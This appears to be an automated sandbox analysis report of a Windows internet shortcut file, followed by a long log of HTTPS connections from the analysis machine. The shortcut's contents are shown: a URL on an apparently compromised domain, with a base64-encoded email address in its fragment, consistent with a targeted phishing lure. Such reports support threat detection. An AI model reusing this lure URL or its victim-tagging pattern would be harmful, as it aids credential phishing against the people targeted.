File Content Preview:	[InternetShortcut]..URL=https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==..IconIndex=0..HotKey=0..IDList=..IconFile="C:\Windows\System32\SHELL32.dll"

File Icon


Icon Hash:	64e0e4e4e4e1e1ed

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 20:20:16.501450062 CET	49674	443	192.168.2.6	173.222.162.64
Dec 19, 2024 20:20:16.535661936 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.535778046 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.535794020 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.535862923 CET	49705	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:20:16.536082983 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.536098003 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.536134005 CET	49705	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:20:16.538822889 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.538892031 CET	49705	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:20:16.538921118 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.547296047 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.547374010 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.547378063 CET	49705	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:20:16.555718899 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:20:16.555830956 CET	49705	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:20:16.566274881 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:16.566301107 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:16.566313982 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:16.566412926 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:16.566446066 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:16.566468954 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:16.566495895 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:16.568991899 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:16.595108986 CET	49672	443	192.168.2.6	173.222.162.64
Dec 19, 2024 20:20:16.688690901 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:17.111985922 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:17.113643885 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:17.113696098 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:17.113801956 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:17.236285925 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:17.236305952 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:17.236321926 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:17.659250021 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:17.704507113 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:17.901372910 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:17.902379990 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:18.021977901 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:18.444437981 CET	443	49706	20.198.119.143	192.168.2.6
Dec 19, 2024 20:20:18.485666990 CET	49706	443	192.168.2.6	20.198.119.143
Dec 19, 2024 20:20:24.092703104 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:24.092749119 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:24.092818975 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:24.106184006 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:24.106198072 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.470706940 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.473109961 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:25.473135948 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.474159956 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.474236965 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:25.475461960 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:25.475532055 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.475769043 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:25.475781918 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.531481028 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:25.688229084 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:25.688327074 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:25.688427925 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:25.689759970 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:25.689799070 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:25.978147984 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.978178024 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.978247881 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:25.978301048 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:25.978348970 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:25.979290009 CET	49710	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:25.979307890 CET	443	49710	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:26.056195974 CET	49673	443	192.168.2.6	173.222.162.64
Dec 19, 2024 20:20:26.109656096 CET	49674	443	192.168.2.6	173.222.162.64
Dec 19, 2024 20:20:26.205249071 CET	49672	443	192.168.2.6	173.222.162.64
Dec 19, 2024 20:20:26.661715031 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:26.661751986 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:26.661814928 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:26.662158012 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:26.662172079 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:27.911262989 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:27.911370039 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:27.916541100 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:27.916596889 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:27.916819096 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:27.917924881 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:27.918023109 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:27.920272112 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:27.920320034 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:27.920597076 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:27.920629025 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:27.920733929 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:27.920749903 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:27.920883894 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:27.963373899 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:28.480274916 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:28.480654955 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:28.480686903 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:28.482332945 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:28.482398987 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:28.488836050 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:28.488936901 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:28.489160061 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:28.489176989 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:28.541583061 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:28.583486080 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:28.583623886 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:28.583765984 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:28.583961010 CET	49714	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:28.583981991 CET	443	49714	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:28.642426014 CET	443	49700	173.222.162.64	192.168.2.6
Dec 19, 2024 20:20:28.642528057 CET	49700	443	192.168.2.6	173.222.162.64
Dec 19, 2024 20:20:29.613989115 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:29.614281893 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:29.614345074 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:29.615344048 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:29.615427971 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:29.616317034 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:29.616386890 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:29.657123089 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:29.657175064 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:29.702753067 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.702830076 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.702856064 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.702893972 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.702903032 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:29.702915907 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.702934027 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.702951908 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:29.702963114 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.702970982 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:29.702989101 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:29.703180075 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.703232050 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:29.703433037 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:29.705857992 CET	49716	443	192.168.2.6	13.227.8.47
Dec 19, 2024 20:20:29.705877066 CET	443	49716	13.227.8.47	192.168.2.6
Dec 19, 2024 20:20:29.713885069 CET	49721	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:29.713927031 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:29.714020967 CET	49721	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:29.714313984 CET	49721	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:29.714328051 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:29.854933977 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:29.854988098 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:29.855074883 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:29.855356932 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:29.855374098 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:31.056557894 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.063271999 CET	49721	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:31.063291073 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.063777924 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.064184904 CET	49721	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:31.064265013 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.064783096 CET	49721	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:31.107414961 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.483015060 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:31.483102083 CET	443	49724	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:31.483268976 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:31.483737946 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:31.483802080 CET	443	49725	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:31.484069109 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:31.484086037 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:31.484105110 CET	443	49724	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:31.484812021 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:31.484831095 CET	443	49725	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:31.564106941 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.564302921 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.567431927 CET	49721	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:31.579391003 CET	49721	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:31.579407930 CET	443	49721	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.651125908 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:31.654411077 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:31.654474974 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:31.656017065 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:31.656110048 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:31.660036087 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:31.660130024 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:31.660186052 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:31.705847025 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:31.705909967 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:31.752819061 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:31.800652027 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:31.800682068 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:31.801039934 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:31.808736086 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:31.808757067 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:32.417870998 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.417912960 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.417922974 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.417973042 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.418020964 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.418045998 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:32.418051004 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.418123960 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.418154001 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.418164968 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:32.418165922 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:32.418205976 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:32.419143915 CET	49722	443	192.168.2.6	13.227.8.64
Dec 19, 2024 20:20:32.419173002 CET	443	49722	13.227.8.64	192.168.2.6
Dec 19, 2024 20:20:32.710237980 CET	443	49725	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.710508108 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.710530996 CET	443	49725	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.711496115 CET	443	49724	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.711672068 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.711740017 CET	443	49724	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.711996078 CET	443	49725	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.712050915 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.713175058 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.713202953 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.713255882 CET	443	49725	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.713361979 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.713370085 CET	443	49725	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.713381052 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.713414907 CET	443	49724	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.713460922 CET	49725	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.713538885 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.713998079 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.714086056 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.714343071 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.714662075 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.714713097 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.715059996 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.715105057 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.715143919 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.715166092 CET	443	49724	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.715342999 CET	49724	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.715456009 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.715491056 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:32.715543985 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.715744019 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:32.715756893 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.155486107 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.157721996 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:33.157788992 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.158854008 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.158945084 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:33.159394026 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:33.159475088 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.159518003 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:33.203412056 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.212837934 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:33.212869883 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.259088039 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:33.667154074 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.667232990 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.667320013 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:33.667880058 CET	49727	443	192.168.2.6	162.241.2.141
Dec 19, 2024 20:20:33.667897940 CET	443	49727	162.241.2.141	192.168.2.6
Dec 19, 2024 20:20:33.948106050 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.949306965 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.949350119 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.950913906 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.950989962 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.951942921 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.953586102 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.953687906 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.953799963 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.953819990 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.954047918 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.954065084 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.955468893 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.955528975 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.956540108 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.956628084 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:33.997159958 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.997162104 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:33.997172117 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:34.048036098 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:37.408852100 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:37.408945084 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:37.409029007 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:37.410041094 CET	49732	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:37.410073042 CET	443	49732	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:37.474313021 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:37.515361071 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:37.553177118 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:37.553205013 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:37.553261042 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:37.553509951 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:37.553524971 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:37.700539112 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:37.700592041 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:37.700721979 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:37.701462030 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:37.701474905 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:38.774055958 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:38.774374962 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:38.774388075 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:38.775471926 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:38.775521994 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:38.776869059 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:38.776932001 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:38.777026892 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:38.819333076 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:38.827585936 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:38.827594042 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:38.874452114 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:39.234518051 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:39.234638929 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:39.234699011 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:39.235876083 CET	49745	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:39.235888958 CET	443	49745	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:39.237221003 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:39.237266064 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:39.237437963 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:39.237755060 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:39.237793922 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:39.321309090 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:39.321372986 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:39.321445942 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:39.915708065 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:39.915828943 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:39.917922974 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:39.917943001 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:39.918708086 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:39.920708895 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:39.920783043 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:39.920794964 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:39.920938969 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:39.967339039 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:40.298435926 CET	49717	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:20:40.298472881 CET	443	49717	142.250.181.132	192.168.2.6
Dec 19, 2024 20:20:40.451242924 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:40.451622009 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:40.451668978 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:40.452059984 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:40.452400923 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:40.452492952 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:40.452745914 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:40.463558912 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:40.463776112 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:40.463834047 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:40.464580059 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:40.464606047 CET	443	49746	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:40.464631081 CET	49746	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:40.495373964 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:40.891942024 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:40.892159939 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:40.892213106 CET	49733	443	192.168.2.6	172.67.134.25
Dec 19, 2024 20:20:40.892978907 CET	49733	443	192.168.2.6	172.67.134.25
